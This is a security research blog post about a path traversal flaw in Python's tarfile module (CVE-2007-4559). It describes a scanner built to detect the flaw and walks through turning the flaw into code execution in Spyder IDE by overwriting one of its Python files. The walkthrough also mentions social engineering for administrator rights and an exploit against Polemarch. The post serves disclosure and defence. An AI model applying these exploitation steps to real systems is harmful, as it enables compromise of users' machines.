Take a Product Tour Request a Demo Cybersecurity Assessment Contact Us

Blogs

The latest cybersecurity trends, best practices, security vulnerabilities, and more

Tarfile: Exploiting the World With a 15-Year-Old Vulnerability

While investigating an unrelated vulnerability, Trellix Advanced Research Center stumbled across a vulnerability in Python’s tarfile module. Initially we thought we had found a new zero-day vulnerability. As we dug into the issue, we realized this was in fact CVE-2007-4559. The vulnerability is a path traversal attack in the extract and extractall functions in the tarfile module that allow an attacker to overwrite arbitrary files by adding the “..” sequence to filenames in a TAR archive.

Over the course of our research into the impact of this vulnerability we discovered that hundreds of thousands of repositories were vulnerable to this vulnerability. While the vulnerability was originally only marked as a 6.8, we were able to confirm that in most cases an attacker can gain code execution from the file write. In the video below, we show how we were able to get code execution by exploiting Universal Radio Hacker:

twitter demo video
Watch on Youtube

The purpose of this blog is to dive into the technical details of the vulnerability and to show how easy it is for an attacker to write an exploit for the vulnerability. Over the course of the blog we will also explore the process of writing a tool to automatically detect the tarfile vulnerability in source code by leveraging the power of the AST intermediate representation. Finally, the post will walk you through how we exploited a popular open-source repository, using the path traversal attack to perform code execution.

The tarfile vulnerability

Tarfiles are a collection of multiple different files and metadata which is later used to unarchive the tarfile. The metadata contained within a tar archive includes but is not limited to information such as the file name, the size and checksum of the file and information about the owner of the file when the file was archived. In the Python tarfile module this information is represented by the TarInfo class which is generated for every “member” in a tar archive. These members can represent many different types of structures in a filesystem from directories, symbolic links, files, and more.

Path Joining with the Filename
Figure 1: Path Joining with the Filename

In the image above we can see a snippet of code from the extract function in the tarfile module. This code snippet shows how the filename is constructed before being passed to the function that extracts and writes the file to the filesystem. The code explicitly trusts the information in the TarInfo object and joins the path that is passed to the extract function and the name in the TarInfo object allowing an attacker to perform a directory traversal attack.

Extractall Looping Through Archive Members
Figure 2: Extractall Looping Through Archive Members

Since the extractall function relies on the extract function, as seen above, the extractall function is also vulnerable to the directory traversal attack.

The tarfile exploit

For an attacker to take advantage of this vulnerability they need to add “..” with the separator for the operating system (“/” or “\”) into the file name to escape the directory the file is supposed to be extracted to. Python’s tarfile module lets us do exactly this:

Crafting a Malicious Archive
Figure 3: Crafting a Malicious Archive

The tarfile module lets users add a filter that can be used to parse and modify a file’s metadata before it is added to the tar archive. This enables attackers to create their exploits with as little as the 6 lines of code above.

Building creosote

After discovering that the tarfile module was still vulnerable, we wanted a way to automatically check repositories for the vulnerability so that we could assess the extent of the vulnerability. To do this we built Creosote, a Python script that recursively looks through directories scanning for .py files and then analyzing them once they have been found. After analyzing files, Creosote will print out any files that may contain vulnerabilities, sorting them into 3 categories based on confidence level (Vulnerable, Probably Vulnerable, Potentially Vulnerable).

In order to analyze the python code, Creosote leverages the Python ast library which allows the script to traverse through constructs in the source code rather than attempting to crudely parse text and figure out spacing in the scripts to find the vulnerabilities. Using the ast library and the NodeVisitor structure Creosote can quickly filter away many extract and extractall functions that may have nothing to do with the vulnerability by only analyzing those that belong to an Attribute node. We can make this distinction since both extract and extractall are instance methods and will always appear in the code base along with the archive object (e.g., tar.extractall()).

After finding an Attribute node, Creosote looks for the two most common code patterns that the team found while analyzing this vulnerability:

Vulnerable Extractall
Figure 4: Vulnerable Extractall

If Creosote finds an Attribute node with extractall it will backtrack and try to check if open was also called and check for whether the second argument or opening mode was set to “r”. Depending on how many criteria get hit the script marks the line as vulnerable, probably vulnerable, or potentially vulnerable.

Vulnerable Extract Loop
Figure 5: Vulnerable Extract Loop

Another common occurrence was for an extract to happen within a for loop when iterating through all the members in the file. While the previous case could have been done simply by looking at the lines rather than the ast representation, this gets more difficult with the loop since the members can be looped through many ways. In the snippet below grabbed from Universal Radio Hacker the for loop loops through members that are enumerated using the enumerate function. By leveraging the intermediate interpretation, Creosote can detect loops through getmembers in any form it may appear.

Vulnerable Extract Loop in URH
Figure 6: Vulnerable Extract Loop in URH

Exploiting the tarfile vulnerability in the real world

Spyder IDE is a free and open-source scientific environment written for Python that can be run on Windows and macOS.

While running Creosote, we discovered that there was a vulnerability in the Spyder repository:

Creosote Output for Spyder
Figure 7: Creosote Output for Spyder

Vulnerable Code in Spyder
Figure 8: Vulnerable Code in Spyder

After looking through the codebase, we discovered that the load_dictionary function gets called whenever a user imports a .spydata file inside of the variable explorer. Spydata files are used to save and transfer variables between different projects and scripts and can be shared between multiple people.

Spyder Variable Explorer
Figure 9: Spyder Variable Explorer

Now that we knew we could use the import data button to upload a malicious file, we needed to test it. The first step in this process was to try to find out where the extraction directory was located. Prior to calling extractall we can see that the program calls chdir on a temporary folder it creates, chdir changes the current working directory to the folder that is passed to it. This indicates that Spider is trying to extract to a temporary folder. After looking into what mkdtemp does we were able to discover that on Windows the function creates a temporary file inside of C:\Users\ \AppData\Local\Temp .

Now with the understanding of where the uploaded file lands, it’s time to see if we can use the directory traversal attack to get outside of the directory. To do this we uploaded a .spydata file that should write to C:\Users\ \AppData\Local\Temp\{TEMP_FOLDER} however due to the path traversal we expect our file to appear in C:\Users\ \AppData\:

New File in AppData
Figure 10: New File in AppData

After importing the .spydata file we can see that we now have a hacked.txt file inside of the AppData directory which means our attack worked, however we also get an error that appears in Spyder:

Spyder Error Message
Figure 11: Spyder Error Message

We now have two goals: to exploit the IDE without an error appearing, and to turn our system write into code execution. Luckily, the error message we received had some extra details that helped us solve both problems. The details told us the exception as well as which line of code caused the exception, this happened to be the line right after the extractall call. After a quick look we can see that the program expects one .pickle file to have been extracted from the .spydata file. The details also help us solve the issue of how to get code execution by showing us that the python files being run by the program reside under AppData\Local and can therefore be modified/overwritten without needing administrator privileges.

After looking through the codebase we decided that the best place to add code would be in mainwindow.py since the code was always run when the application was opened and was run before the main window was created but after the application had checked to see if it could run. We then copied the file and added some code to pop up a message box before creating a new .spydata file, this time with a valid .pickle file for the variable importer:

Success Notification Code
Figure 12: Success Notification Code

After importing the new .spydata file the IDE loads up valid variables and the program continues uninterrupted rather than throwing an error message. Once the program is reopened, we now get the popup that we had programmed into the start of the program:

Successful Exploit
Figure 13: Successful Exploit

While code execution by itself can be devastating, we did not want to stop there. Watch the demo video below to see how we added code to try and social engineer the attacked user to give the attacker code execution with administrator privileges:

spyder demo video
Watch on Youtube

The tarfile exploit lets an attacker escalate the file write to code execution on more than just Windows. Watch the video below to see how we were able to exploit Polemarch, an IT infrastructure management service running on Linux and Docker:

polemarch demo video
Watch on Youtube

As we have demonstrated above, this vulnerability is incredibly easy to exploit, requiring little to no knowledge about complicated security topics. Due to this fact and the prevalence of the vulnerability in the wild, Python’s tarfile module has become a massive supply chain issue threatening infrastructure around the world. Our team at Trellix is leading the charge by patching as many open-source repositories as possible as well as providing a way to scan closed source repositories. We hope that you will join us in our attempt to strengthen the security of code bases around the world.

This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers.
This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. Trellix conducts research in accordance with its Vulnerability Reasonable Disclosure Policy. Any attempt to recreate part or all of the activities described is solely at the user’s risk, and neither Trellix nor its affiliates will bear any responsibility or liability.

Get the latest

We’re no strangers to cybersecurity. But we are a new company.
Stay up to date as we evolve.

Please enter a valid email address.

Zero spam. Unsubscribe at any time.